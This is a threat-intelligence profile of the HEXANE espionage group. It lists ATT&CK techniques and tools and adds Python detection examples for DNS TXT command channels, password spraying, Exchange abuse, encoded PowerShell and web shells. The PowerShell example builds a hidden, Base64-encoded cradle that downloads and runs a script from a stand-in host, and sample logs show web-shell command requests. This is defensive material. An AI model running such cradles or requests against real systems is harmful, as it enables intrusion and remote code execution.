HEXANE

HEXANE is a cyber espionage threat group that has targeted oil & gas, telecommunications, aviation, and internet service provider organizations since at least 2017. Targeted companies have been located in the Middle East and Africa, including Israel, Saudi Arabia, Kuwait, Morocco, and Tunisia. HEXANE's TTPs appear similar to APT33 and OilRig but due to differences in victims and tools it is tracked as a separate entity.[1][2][3][4]

ID: G1001
Associated Groups: Lyceum, Siamesekitten, Spirlin
Contributors: Dragos Threat Intelligence; Mindaugas Gudzis, BT Security
Version: 2.3
Created: 17 October 2018
Last Modified: 14 August 2024

Associated Group Descriptions

Name Description
Lyceum [5]
Siamesekitten [3]
Spirlin [4]

Campaigns

Techniques Used

Domain ID Name Use
Enterprise T1134 .001 Access Token Manipulation: Token Impersonation/Theft

During HomeLand Justice, threat actors used custom tooling to impersonate logged-on users by applying stolen access tokens through the ImpersonateLoggedOnUser and SetThreadToken APIs.[7]

Enterprise T1087 .003 Account Discovery: Email Account

During HomeLand Justice, threat actors used compromised Exchange accounts to search mailboxes for administrator accounts.[8]

Enterprise T1098 .002 Account Manipulation: Additional Email Delegate Permissions

During HomeLand Justice, threat actors added the ApplicationImpersonation management role to accounts under their control to impersonate users and take ownership of targeted mailboxes.[7]

Enterprise T1583 .001 Acquire Infrastructure: Domains

HEXANE has registered and operated domains for campaigns, often using a security or web technology theme or impersonating the targeted organization.[5][1][3]

.002 Acquire Infrastructure: DNS Server

HEXANE has set up custom DNS servers to send commands to compromised hosts via TXT records.[9]
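The DNS TXT channel above leaves a recognisable shape in resolver logs: one host repeatedly asking for TXT records of unique, long, machine-generated subdomains under one registered domain, at regular intervals, and getting back base64-looking text instead of SPF/DKIM/DMARC strings. The following is an added detection example written for this page, not tooling from HEXANE, the DnsSystem malware, or the cited reports; the log lines, the domain update-check.example, the thresholds, and the scoring are all constructed assumptions to be tuned against a real resolver's baseline.

```python
import re
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed resolver log excerpt (not real traffic): "<ts> <client> <qtype> <qname> <rcode> <answer>".
# The update-check.example lines imitate TXT-record tasking; the contoso.com lines are ordinary SPF/DMARC lookups.
SAMPLE_DNS_LOG = """\
2022-03-01T10:00:00Z 10.0.0.12 TXT 7a9f3k2mx8q1zv4b0n5c6d3e8f2g1h.update-check.example NOERROR "d2hvYW1pIC9hbGw="
2022-03-01T10:00:30Z 10.0.0.12 TXT _dmarc.contoso.com NOERROR "v=DMARC1; p=reject"
2022-03-01T10:01:00Z 10.0.0.12 TXT k3j9d8s7a6f5g4h3j2k1l0m9n8b7v6c5.update-check.example NOERROR "bmV0IHVzZXIgL2RvbWFpbg=="
2022-03-01T10:02:00Z 10.0.0.12 TXT q1w2e3r4t5y6u7i8o9p0a1s2d3f4g5h6.update-check.example NOERROR "aXBjb25maWcgL2FsbA=="
2022-03-01T10:02:15Z 10.0.0.33 A www.contoso.com NOERROR 198.51.100.20
2022-03-01T10:03:00Z 10.0.0.12 TXT z9x8c7v6b5n4m3l2k1j0h9g8f7d6s5a4.update-check.example NOERROR "dGFza2xpc3QgL3Y="
2022-03-01T10:03:40Z 10.0.0.33 TXT contoso.com NOERROR "v=spf1 include:spf.protection.outlook.com -all"
2022-03-01T10:04:00Z 10.0.0.12 TXT p0o9i8u7y6t5r4e3w2q1l0k9j8h7g6f5.update-check.example NOERROR "c3lzdGVtaW5mbw=="
2022-03-01T10:05:00Z 10.0.0.12 TXT m1n2b3v4c5x6z7a8s9d0f1g2h3j4k5l6.update-check.example NOERROR "bmV0IGdyb3VwIC9kb21haW4="
"""

# A TXT answer made only of base64 characters, with no spaces or "v=" prefix, is unusual for legitimate records.
B64_RE = re.compile(r"^[A-Za-z0-9+/=]{16,}$")


def parse_dns_log(text):
    """Parse the constructed log layout into dicts; the answer field may contain spaces."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, qtype, qname, rcode, answer = line.split(maxsplit=5)
        rows.append({
            "ts": datetime.fromisoformat(ts.replace("Z", "+00:00")),
            "src": src,
            "qtype": qtype,
            "qname": qname.lower().rstrip("."),
            "rcode": rcode,
            "answer": answer.strip('"'),
        })
    return rows


def registered_domain(qname):
    # Simplification: last two labels. A public-suffix list is needed for co.uk-style domains.
    return ".".join(qname.split(".")[-2:])


def score_txt_groups(rows, min_queries=4):
    """Group TXT queries by (client, registered domain) and flag groups with >=3 C2-like indicators."""
    groups = defaultdict(list)
    for r in rows:
        if r["qtype"] == "TXT":
            groups[(r["src"], registered_domain(r["qname"]))].append(r)

    findings = []
    for (src, dom), qs in groups.items():
        if len(qs) < min_queries:
            continue
        qs.sort(key=lambda r: r["ts"])
        labels = [r["qname"].split(".")[0] for r in qs]
        unique_ratio = len({r["qname"] for r in qs}) / len(qs)          # data encoded in the label => every query unique
        mean_label = statistics.mean(len(lbl) for lbl in labels)        # encoded labels are long
        b64_frac = sum(bool(B64_RE.match(r["answer"])) for r in qs) / len(qs)
        gaps = [(b["ts"] - a["ts"]).total_seconds() for a, b in zip(qs, qs[1:])]
        periodic = (len(gaps) >= 3 and statistics.mean(gaps) > 0
                    and statistics.pstdev(gaps) / statistics.mean(gaps) < 0.2)  # beacon-like timing
        indicators = {
            "unique_subdomains": unique_ratio >= 0.75,
            "long_labels": mean_label >= 16,
            "b64_answers": b64_frac >= 0.5,
            "periodic": periodic,
        }
        if sum(indicators.values()) >= 3:
            findings.append({"src": src, "domain": dom, "queries": len(qs), **indicators})
    return findings


if __name__ == "__main__":
    for f in score_txt_groups(parse_dns_log(SAMPLE_DNS_LOG)):
        print(f)
```

The four indicators are deliberately independent so that a single benign pattern (a monitoring agent polling one TXT record every minute, for example) does not trip the rule on its own; on a real network the baseline of legitimate TXT users (SPF, DKIM, DMARC, ACME validation, some software licensing checks) should be reviewed before lowering the thresholds.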

Enterprise T1010 Application Window Discovery

HEXANE has used a PowerShell-based keylogging tool to capture the window title.[5]

Enterprise T1110 Brute Force

HEXANE has used brute force attacks to compromise valid credentials.[5]

.003 Password Spraying

HEXANE has used password spraying attacks to obtain valid credentials.[5]
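Brute force and password spraying look different in a domain controller's Security log even though both produce event 4625 failures: a brute-force attempt hammers one account many times from one source, while a spray touches many accounts a very few times each so that no single account reaches its lockout threshold. The example below is added for this page and is not from HEXANE or the cited reports; the event tuples, the source addresses, and the thresholds (10-minute window, at least 5 distinct accounts with at most 2 failures each for a spray, 4 failures on one account for brute force) are constructed assumptions.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed sample of Security-log logon events as (time, EventID, TargetUserName, IpAddress).
# 4625 = failed logon, 4624 = successful logon. Not real telemetry.
SAMPLE_LOGONS = [
    ("2022-07-18T02:00:01", 4625, "a.ahmed",   "203.0.113.7"),   # spray: many accounts, 1-2 tries each
    ("2022-07-18T02:00:05", 4625, "b.cohen",   "203.0.113.7"),
    ("2022-07-18T02:00:09", 4625, "c.dupont",  "203.0.113.7"),
    ("2022-07-18T02:00:14", 4625, "d.elmasri", "203.0.113.7"),
    ("2022-07-18T02:00:20", 4625, "e.fahmi",   "203.0.113.7"),
    ("2022-07-18T02:00:27", 4625, "f.gamal",   "203.0.113.7"),
    ("2022-07-18T02:00:40", 4625, "a.ahmed",   "203.0.113.7"),
    ("2022-07-18T02:00:44", 4625, "b.cohen",   "203.0.113.7"),
    ("2022-07-18T02:10:03", 4625, "jdoe",      "198.51.100.9"),  # brute force: one account, repeated
    ("2022-07-18T02:10:05", 4625, "jdoe",      "198.51.100.9"),
    ("2022-07-18T02:10:08", 4625, "jdoe",      "198.51.100.9"),
    ("2022-07-18T02:10:12", 4625, "jdoe",      "198.51.100.9"),
    ("2022-07-18T08:31:50", 4625, "m.tahir",   "10.0.0.5"),      # one typo, then success: benign
    ("2022-07-18T08:32:04", 4624, "m.tahir",   "10.0.0.5"),
]


def detect_spray(events, window=timedelta(minutes=10), min_accounts=5, max_per_account=2):
    """Return (ip, distinct_accounts, failures) for sources whose failures within a sliding
    window spread over many accounts with few attempts each."""
    by_ip = defaultdict(list)
    for ts, event_id, user, ip in events:
        if event_id == 4625:
            by_ip[ip].append((datetime.fromisoformat(ts), user.lower()))

    alerts = []
    for ip, evs in by_ip.items():
        evs.sort()
        start, best = 0, None
        for end in range(len(evs)):
            while evs[end][0] - evs[start][0] > window:   # slide the window's left edge
                start += 1
            counts = Counter(u for _, u in evs[start:end + 1])
            if len(counts) >= min_accounts and max(counts.values()) <= max_per_account:
                if best is None or len(counts) >= best[0]:
                    best = (len(counts), end - start + 1)
        if best:
            alerts.append((ip, best[0], best[1]))
    return alerts


def detect_brute_force(events, window=timedelta(minutes=10), min_failures=4):
    """Return (ip, account, failures) for a single account failing repeatedly from one source."""
    by_key = defaultdict(list)
    for ts, event_id, user, ip in events:
        if event_id == 4625:
            by_key[(ip, user.lower())].append(datetime.fromisoformat(ts))

    alerts = []
    for (ip, user), times in by_key.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 >= min_failures:
                alerts.append((ip, user, end - start + 1))
                break
    return alerts


if __name__ == "__main__":
    print("spray:", detect_spray(SAMPLE_LOGONS))
    print("brute force:", detect_brute_force(SAMPLE_LOGONS))
```

The distinction matters operationally: a lockout policy that stops the brute-force case does nothing against the spray, which is why the spray rule keys on the source address and account diversity rather than on per-account failure counts. Against sprays through a web proxy or cloud identity provider, the source field will be the proxy or the tenant's sign-in log rather than a Security-log IpAddress, but the shape of the rule is the same.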

Enterprise T1059 .001 Command and Scripting Interpreter: PowerShell

HEXANE has used PowerShell-based tools and scripts for discovery and collection on compromised hosts.[5][10][2]

During HomeLand Justice, threat actors used PowerShell cmdlets New-MailboxSearch and Get-Recipient for discovery.[8][7]
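The Exchange activity described under T1098.002 and T1059.001 above (granting the ApplicationImpersonation role, then searching mailboxes for administrator accounts with New-MailboxSearch and enumerating recipients with Get-Recipient) is recorded by Exchange's admin audit log, which an administrator queries with Search-AdminAuditLog; current holders of the role can be listed with Get-ManagementRoleAssignment -Role ApplicationImpersonation. The following is an added hunting example written for this page, not code from the cited reports or from Microsoft: it parses a simplified, constructed rendering of audit records (real Search-AdminAuditLog output is an object with CmdletParameters, not the pipe-separated lines used here) and flags the cmdlet sequence, with the severity labels, the CONTOSO accounts and the record layout all being assumptions.

```python
from dataclasses import dataclass, field

# Constructed sample in a simplified one-record-per-line layout (not real Exchange output);
# field names mirror properties returned by Search-AdminAuditLog.
SAMPLE_AUDIT_LOG = """\
2022-07-18T09:58:03Z|Caller=CONTOSO\\svc-backup|Cmdlet=Get-Recipient|Params=ResultSize=Unlimited
2022-07-18T10:02:41Z|Caller=CONTOSO\\svc-backup|Cmdlet=New-ManagementRoleAssignment|Params=Role=ApplicationImpersonation;User=svc-backup
2022-07-18T10:05:12Z|Caller=CONTOSO\\svc-backup|Cmdlet=New-MailboxSearch|Params=Name=admin-sweep;SearchQuery=admin;TargetMailbox=svc-backup
2022-07-18T11:30:00Z|Caller=CONTOSO\\exadmin|Cmdlet=Set-Mailbox|Params=Identity=jdoe;ProhibitSendQuota=10GB
2022-07-19T08:12:09Z|Caller=CONTOSO\\exadmin|Cmdlet=Get-Recipient|Params=Identity=jdoe
"""


@dataclass
class AuditRecord:
    when: str
    caller: str
    cmdlet: str
    params: dict = field(default_factory=dict)


def parse_audit_log(text):
    """Parse the constructed layout: <time>|Caller=..|Cmdlet=..|Params=k=v;k=v."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        when, *fields = line.split("|")
        kv = dict(f.split("=", 1) for f in fields)
        params = {}
        for item in kv.get("Params", "").split(";"):
            if "=" in item:
                k, v = item.split("=", 1)
                params[k] = v
        records.append(AuditRecord(when, kv["Caller"], kv["Cmdlet"], params))
    return records


def classify(rec):
    """Map one record to (severity, reason) or None. Severities are this example's assumption."""
    c = rec.cmdlet.lower()
    if c == "new-managementroleassignment" and rec.params.get("Role", "").lower() == "applicationimpersonation":
        return "HIGH", "ApplicationImpersonation role granted (T1098.002)"
    if c in ("new-mailboxsearch", "search-mailbox", "new-compliancesearch"):
        return "MEDIUM", "mailbox search created (T1087.003)"
    if c == "add-mailboxpermission" and "fullaccess" in rec.params.get("AccessRights", "").lower():
        return "MEDIUM", "FullAccess delegation added (T1098.002)"
    if c == "get-recipient" and rec.params.get("ResultSize", "").lower() == "unlimited":
        return "LOW", "bulk recipient enumeration (T1087.003)"
    return None


def find_suspicious(text):
    """Return (when, caller, cmdlet, severity, reason) for every record that matches a rule."""
    hits = []
    for rec in parse_audit_log(text):
        verdict = classify(rec)
        if verdict:
            hits.append((rec.when, rec.caller, rec.cmdlet, verdict[0], verdict[1]))
    return hits


def impersonation_then_search(text):
    """Callers who both granted themselves/others ApplicationImpersonation and ran a mailbox search:
    the combination is far rarer than either action alone."""
    granted, searched = set(), set()
    for rec in parse_audit_log(text):
        verdict = classify(rec)
        if not verdict:
            continue
        if "ApplicationImpersonation" in verdict[1]:
            granted.add(rec.caller)
        if "mailbox search" in verdict[1]:
            searched.add(rec.caller)
    return sorted(granted & searched)


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_AUDIT_LOG):
        print(hit)
    print("role grant followed by search:", impersonation_then_search(SAMPLE_AUDIT_LOG))
```

The single-record rules will fire on legitimate administration (backup and migration service accounts are routinely given ApplicationImpersonation; eDiscovery staff create mailbox searches), so the correlation in impersonation_then_search, plus a check that the caller is an account expected to hold those rights, is what makes the alert actionable.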

.003 Command and Scripting Interpreter: Windows Command Shell

During HomeLand Justice, threat actors used Windows batch files for persistence and execution.[8][7]

.005 Command and Scripting Interpreter: Visual Basic

HEXANE has used a VisualBasic script named MicrosoftUpdator.vbs for execution of a PowerShell keylogger.[2]

Enterprise T1586 .002 Compromise Accounts: Email Accounts

HEXANE has used compromised accounts to send spearphishing emails.[5]

Enterprise T1555 Credentials from Password Stores

HEXANE has run cmdkey on victim machines to identify stored credentials.[2]

.003 Credentials from Web Browsers

HEXANE has used a Mimikatz-based tool and a PowerShell script to steal passwords from Google Chrome.[2]

Enterprise T1486 Data Encrypted for Impact

During HomeLand Justice, threat actors used ROADSWEEP ransomware to encrypt files on targeted systems.[6][8][7]

Enterprise T1561 .002 Disk Wipe: Disk Structure Wipe

During HomeLand Justice, threat actors used a version of ZeroCleare to wipe disk drives on targeted hosts.[8][7]

Enterprise T1114 .002 Email Collection: Remote Email Collection

During HomeLand Justice, threat actors made multiple HTTP POST requests to the Exchange servers of the victim organization to transfer data.[8]

Enterprise T1585 .001 Establish Accounts: Social Media Accounts

HEXANE has established fraudulent LinkedIn accounts impersonating HR department employees to target potential victims with fake job offers.[3]

.002 Establish Accounts: Email Accounts

HEXANE has established email accounts for use in domain registration including for ProtonMail addresses.[2]

Enterprise T1546 .003 Event Triggered Execution: Windows Management Instrumentation Event Subscription

HEXANE has used WMI event subscriptions for persistence.[2]

Enterprise T1041 Exfiltration Over C2 Channel

During HomeLand Justice, threat actors used HTTP to transfer data from compromised Exchange servers.[8]

Enterprise T1567 .002 Exfiltration Over Web Service: Exfiltration to Cloud Storage

HEXANE has used cloud services, including OneDrive, for data exfiltration.[11]

Enterprise T1190 Exploit Public-Facing Application

For HomeLand Justice, threat actors exploited CVE-2019-0604 in Microsoft SharePoint for initial access.[8]

Enterprise T1589 Gather Victim Identity Information

HEXANE has identified specific potential victims at targeted organizations.[3]

.002 Email Addresses

HEXANE has targeted executives, human resources staff, and IT personnel for spearphishing.[5][3]

Enterprise T1591 .004 Gather Victim Org Information: Identify Roles

HEXANE has identified executives, HR, and IT staff at victim organizations for further targeting.[5][3]

Enterprise T1562 .001 Impair Defenses: Disable or Modify Tools

During HomeLand Justice, threat actors modified and disabled components of endpoint detection and response (EDR) solutions including Microsoft Defender Antivirus.[7]

.002 Impair Defenses: Disable Windows Event Logging

During HomeLand Justice, threat actors deleted Windows event and application logs.[7]

Enterprise T1105 Ingress Tool Transfer

HEXANE has downloaded additional payloads and malicious scripts onto a compromised host.[2]

During HomeLand Justice, threat actors used web shells to download files to compromised infrastructure.[7]

Enterprise T1056 .001 Input Capture: Keylogging

HEXANE has used a PowerShell-based keylogger named kl.ps1.[5][2]

Enterprise T1534 Internal Spearphishing

HEXANE has conducted internal spearphishing attacks against executives, HR, and IT personnel to gain information and access.[5]

Enterprise T1570 Lateral Tool Transfer

During HomeLand Justice, threat actors initiated a process named Mellona.exe to spread the ROADSWEEP file encryptor and a persistence script to a list of internal machines.[8]

Enterprise T1036 .005 Masquerading: Match Legitimate Name or Location

During HomeLand Justice, threat actors renamed ROADSWEEP to GoXML.exe and ZeroCleare to cl.exe.[8][6]

Enterprise T1046 Network Service Discovery

During HomeLand Justice, threat actors executed the Advanced Port Scanner tool on compromised systems.[8][7]

Enterprise T1027 .010 Obfuscated Files or Information: Command Obfuscation

HEXANE has used Base64-encoded scripts.[2]
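A Base64-encoded PowerShell script on the command line is easy to recover: the -EncodedCommand argument is the UTF-16LE bytes of the script, base64-encoded, and scripts built this way often carry a second layer inside a FromBase64String('...') literal. The example below is added for this page and is not HEXANE's tooling or a decoder from the cited reports; it builds a constructed two-layer sample the way an operator would (the download cradle fetching a file named kl.ps1 from 203.0.113.9 is a made-up stand-in, not an observed URL) and then peels both layers back and tags the usual indicators. The switch spellings and indicator patterns are this example's assumptions.

```python
import base64
import binascii
import re

# The EncodedCommand switch in the spellings most often seen on the command line
# (-e, -ec, -en, -enc, -EncodedCommand), followed by its base64 argument. Assumed list.
ENC_RE = re.compile(r"(?i)(?:^|\s)-e(?:c|n|nc|ncodedcommand)?\s+(?P<b64>[A-Za-z0-9+/=]{8,})")
NESTED_RE = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
INDICATORS = {
    "download-cradle": re.compile(r"(?i)DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient"),
    "invoke-expression": re.compile(r"(?i)Invoke-Expression|\bIEX\b"),
    "nested-base64": re.compile(r"(?i)FromBase64String"),
    "hidden-window": re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"),
}


def encode_command(script):
    """Build an -EncodedCommand argument exactly as PowerShell expects it: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample: an inner download cradle wrapped in a second base64 layer.
INNER = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.9/kl.ps1')"
OUTER = ("$p=[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('"
         + encode_command(INNER) + "')); IEX $p")
SAMPLE_CMDLINE = "powershell.exe -NoP -W Hidden -Enc " + encode_command(OUTER)


def _decode_text(raw):
    """Decode bytes as UTF-16LE (PowerShell's convention) or UTF-8, accepting only printable text."""
    for enc in ("utf-16-le", "utf-8"):
        try:
            text = raw.decode(enc)
        except UnicodeDecodeError:
            continue
        if all(ch.isprintable() or ch in "\r\n\t" for ch in text):
            return text
    return None


def decode_layers(b64, max_depth=5):
    """Decode the outer script, then every FromBase64String('...') literal found in a decoded layer."""
    layers, queue = [], [b64]
    while queue and len(layers) < max_depth:
        try:
            raw = base64.b64decode(queue.pop(0))
        except (binascii.Error, ValueError):
            continue
        text = _decode_text(raw)
        if text is None:
            continue
        layers.append(text)
        queue.extend(NESTED_RE.findall(text))
    return layers


def analyze(cmdline):
    """Return {'layers': [...], 'indicators': [...]} for an encoded command line, or None if there is none."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    layers = decode_layers(m.group("b64"))
    haystack = "\n".join([cmdline] + layers)   # indicators may sit in the command line itself (-W Hidden)
    found = sorted(name for name, rx in INDICATORS.items() if rx.search(haystack))
    return {"layers": layers, "indicators": found}


if __name__ == "__main__":
    result = analyze(SAMPLE_CMDLINE)
    for depth, layer in enumerate(result["layers"]):
        print(f"layer {depth}: {layer}")
    print("indicators:", result["indicators"])
```

Feeding Sysmon event 1 or Security event 4688 command lines through analyze and alerting on two or more indicators catches the encoded-cradle pattern without matching every administrator who uses -EncodedCommand for quoting convenience; PowerShell script block logging (event 4104) records the decoded script directly and is the better source where it is enabled.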

Enterprise T1588 .002 Obtain Capabilities: Tool

HEXANE has acquired, and sometimes customized, open source tools such as Mimikatz, Empire, VNC remote access software, and DIG.net.[2][5][9]

During HomeLand Justice, threat actors used tools including Advanced Port Scanner, Mimikatz, and Impacket.[8][7]

.003 Obtain Capabilities: Code Signing Certificates

During HomeLand Justice, threat actors used tools with legitimate code signing certificates.[8]

Enterprise T1003 .001 OS Credential Dumping: LSASS Memory

During HomeLand Justice, threat actors dumped LSASS memory on compromised hosts.[8]

Enterprise T1069 .001 Permission Groups Discovery: Local Groups

HEXANE has run net localgroup to enumerate local groups.[2]

Enterprise T1057 Process Discovery

HEXANE has enumerated processes on targeted systems.[2]

Enterprise T1021 .001 Remote Services: Remote Desktop Protocol

HEXANE has used remote desktop sessions for lateral movement.[5]

During HomeLand Justice, threat actors primarily used RDP for lateral movement in the victim environment.[8][7]

.002 Remote Services: SMB/Windows Admin Shares

During HomeLand Justice, threat actors used SMB for lateral movement.[8][7]

Enterprise T1018 Remote System Discovery

HEXANE has used net view to enumerate domain machines.[2]

Enterprise T1053 .005 Scheduled Task/Job: Scheduled Task

HEXANE has used a scheduled task to establish persistence for a keylogger.[2]

Enterprise T1505 .003 Server Software Component: Web Shell

For HomeLand Justice, threat actors used .aspx webshells named pickers.aspx, error4.aspx, and ClientBin.aspx, to maintain persistence.[8][7]
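Web shells on an Exchange server and the HTTP POST traffic described under T1114.002, T1041 and T1105 above all pass through IIS, so its W3C logs are the natural place to look: requests to .aspx files that are not part of the product's known page set, POSTs with no Referer from scripted clients, command-style query strings, and unusually large request bodies. The example below is an added detection for this page, not tooling from the cited reports or from Microsoft; the log excerpt is constructed (the web shell names are the ones listed in the entry above, the client addresses and byte counts are made up), and the allowlist of known Exchange pages, the scoring weights and the 1 MB body threshold are assumptions that must be derived from a real server's baseline.

```python
import re

# Constructed IIS W3C-style log excerpt (not a real server's log). IIS writes '+' for spaces
# inside fields and '-' for empty fields; the field order is given by the #Fields: line.
SAMPLE_IIS_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip cs(User-Agent) cs(Referer) sc-status cs-bytes sc-bytes
2022-07-18 09:40:12 GET /owa/auth/logon.aspx url=https://mail.contoso.com/owa/ 10.0.0.21 Mozilla/5.0+(Windows+NT+10.0) - 200 412 8902
2022-07-18 09:41:03 POST /owa/auth/pickers.aspx - 203.0.113.50 python-requests/2.28.0 - 200 2580000 1120
2022-07-18 09:41:55 GET /aspnet_client/error4.aspx cmd=whoami 203.0.113.50 python-requests/2.28.0 - 200 255 904
2022-07-18 09:42:30 POST /ecp/ClientBin.aspx - 203.0.113.50 Mozilla/5.0+(Windows+NT+10.0) - 200 1987000 960
2022-07-18 09:43:10 POST /owa/auth.owa - 10.0.0.21 Mozilla/5.0+(Windows+NT+10.0) https://mail.contoso.com/owa/auth/logon.aspx 302 1024 512
"""

# Assumed baseline of .aspx pages the server legitimately serves; build it from historical logs or the install.
KNOWN_ASPX = {"/owa/auth/logon.aspx", "/owa/auth/errorfe.aspx", "/ecp/default.aspx"}
SCRIPTED_UA = re.compile(r"(?i)python-requests|curl/|go-http-client|powershell")
CMD_PARAM = re.compile(r"(?i)(^|&)(cmd|c|exec|command|z1)=")   # parameter names common in simple shells


def parse_iis_log(text):
    """Read the #Fields: header, then zip each data line against it."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip():
            continue
        elif fields:
            values = line.split()
            if len(values) == len(fields):
                rows.append(dict(zip(fields, values)))
    return rows


def score_request(row, upload_threshold=1_000_000):
    """Return (score, reasons) for one request; weights are this example's assumption."""
    stem = row["cs-uri-stem"].lower()
    reasons = []
    if stem.endswith(".aspx") and stem not in KNOWN_ASPX:
        reasons.append(("unknown .aspx endpoint", 2))
    if row["cs-method"] == "POST" and row["cs(Referer)"] == "-":
        reasons.append(("POST without Referer", 1))
    if int(row["cs-bytes"]) > upload_threshold:
        reasons.append(("large request body", 2))
    if CMD_PARAM.search(row["cs-uri-query"]):
        reasons.append(("command-style query parameter", 2))
    if SCRIPTED_UA.search(row["cs(User-Agent)"]):
        reasons.append(("scripted User-Agent", 1))
    return sum(w for _, w in reasons), [r for r, _ in reasons]


def find_webshell_activity(text, threshold=3):
    """Requests scoring at or above the threshold, in log order."""
    hits = []
    for row in parse_iis_log(text):
        score, reasons = score_request(row)
        if score >= threshold:
            hits.append({"time": row["date"] + " " + row["time"], "c-ip": row["c-ip"],
                         "stem": row["cs-uri-stem"], "score": score, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in find_webshell_activity(SAMPLE_IIS_LOG):
        print(hit)
```

Because a web shell is a file as well as a request pattern, the log finding should be confirmed on disk: the .aspx stems flagged here map to files under the Exchange or IIS web roots whose creation time, owner and content (a short page that calls Process.Start or eval on a request parameter) can be checked directly.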

Enterprise T1518 Software Discovery

HEXANE has enumerated programs installed on an infected machine.[2]

Enterprise T1608 .001 Stage Capabilities: Upload Malware

HEXANE has staged malware on fraudulent websites set up to impersonate targeted organizations.[3]

Enterprise T1082 System Information Discovery

HEXANE has collected the hostname of a compromised machine.[2]

Enterprise T1016 System Network Configuration Discovery

HEXANE has used Ping and tracert for network discovery.[2]

.001 Internet Connection Discovery

HEXANE has used tools including BITSAdmin to test internet connectivity from compromised hosts.[2]

Enterprise T1049 System Network Connections Discovery

HEXANE has used netstat to monitor connections to specific ports.[2]

Enterprise T1033 System Owner/User Discovery

HEXANE has run whoami on compromised machines to identify the current user.[2]

Enterprise T1204 .002 User Execution: Malicious File

HEXANE has relied on victims executing malicious file attachments delivered via email or embedded within actor-controlled websites to deliver malware.[5][1][3][9]

Enterprise T1078 .001 Valid Accounts: Default Accounts

During HomeLand Justice, threat actors used the built-in administrator account to move laterally using RDP and Impacket.[7]

Enterprise T1102 .002 Web Service: Bidirectional Communication

HEXANE has used cloud services, including OneDrive, for C2.[11]

Enterprise T1047 Windows Management Instrumentation

During HomeLand Justice, threat actors used WMI to modify Windows Defender settings.[7]

Software

ID Name References Techniques
S0190 BITSAdmin [2] BITS Jobs, Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol, Ingress Tool Transfer, Lateral Tool Transfer
S1149 CHIMNEYSWEEP [6] Abuse Elevation Control Mechanism: Bypass User Account Control, Application Layer Protocol: Web Protocols, Clipboard Data, Command and Scripting Interpreter: Visual Basic, Command and Scripting Interpreter: PowerShell, Data Encoding: Non-Standard Encoding, Data from Local System, Data Staged: Local Data Staging, Deobfuscate/Decode Files or Information, Execution Guardrails, Exfiltration Over C2 Channel, File and Directory Discovery, Indicator Removal: Timestomp, Ingress Tool Transfer, Input Capture: Keylogging, Modify Registry, Native API, Obfuscated Files or Information, Obfuscated Files or Information: Embedded Payloads, Obfuscated Files or Information: Binary Padding, Obfuscated Files or Information: Dynamic API Resolution, Peripheral Device Discovery, Process Discovery, Scheduled Task/Job: Scheduled Task, Screen Capture, Software Discovery: Security Software Discovery, Subvert Trust Controls: Code Signing, System Binary Proxy Execution: CMSTP, System Owner/User Discovery, System Shutdown/Reboot, Web Service
S1014 DanBot [5] Application Layer Protocol: DNS, Application Layer Protocol: Web Protocols, Command and Scripting Interpreter: Visual Basic, Command and Scripting Interpreter: Windows Command Shell, Data from Local System, Deobfuscate/Decode Files or Information, Indicator Removal: File Deletion, Ingress Tool Transfer, Masquerading: Match Legitimate Name or Location, Obfuscated Files or Information: Encrypted/Encoded File, Phishing: Spearphishing Attachment, Remote Services: VNC, Scheduled Task/Job: Scheduled Task, User Execution: Malicious File
S1021 DnsSystem [9] Application Layer Protocol: DNS, Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Command and Scripting Interpreter: Windows Command Shell, Data Encoding: Standard Encoding, Data from Local System, Exfiltration Over C2 Channel, Ingress Tool Transfer, System Owner/User Discovery, User Execution: Malicious File
S0363 Empire [5] Abuse Elevation Control Mechanism: Bypass User Account Control, Access Token Manipulation: SID-History Injection, Access Token Manipulation, Access Token Manipulation: Create Process with Token, Account Discovery: Domain Account, Account Discovery: Local Account, Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay, Application Layer Protocol: Web Protocols, Archive Collected Data, Automated Collection, Automated Exfiltration, Boot or Logon Autostart Execution: Security Support Provider, Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Boot or Logon Autostart Execution: Shortcut Modification, Browser Information Discovery, Clipboard Data, Command and Scripting Interpreter: PowerShell, Command and Scripting Interpreter: Windows Command Shell, Command and Scripting Interpreter, Create Account: Local Account, Create Account: Domain Account, Create or Modify System Process: Windows Service, Credentials from Password Stores: Credentials from Web Browsers, Domain or Tenant Policy Modification: Group Policy Modification, Domain Trust Discovery, Email Collection: Local Email Collection, Encrypted Channel: Asymmetric Cryptography, Event Triggered Execution: Accessibility Features, Exfiltration Over C2 Channel, Exfiltration Over Web Service: Exfiltration to Code Repository, Exfiltration Over Web Service: Exfiltration to Cloud Storage, Exploitation for Privilege Escalation, Exploitation of Remote Services, File and Directory Discovery, Group Policy Discovery, Hijack Execution Flow: Path Interception by Unquoted Path, Hijack Execution Flow: Path Interception by Search Order Hijacking, Hijack Execution Flow: Path Interception by PATH Environment Variable, Hijack Execution Flow: Dylib Hijacking, Hijack Execution Flow: DLL Search Order Hijacking, Indicator Removal: Timestomp, Ingress Tool Transfer, Input Capture: Keylogging, Input Capture: Credential API Hooking, Native API, Network Service Discovery, Network Share Discovery, Network Sniffing, Obfuscated Files or Information: Command Obfuscation, OS Credential Dumping: LSASS Memory, Process Discovery, Process Injection, Remote Services: Distributed Component Object Model, Remote Services: SSH, Scheduled Task/Job: Scheduled Task, 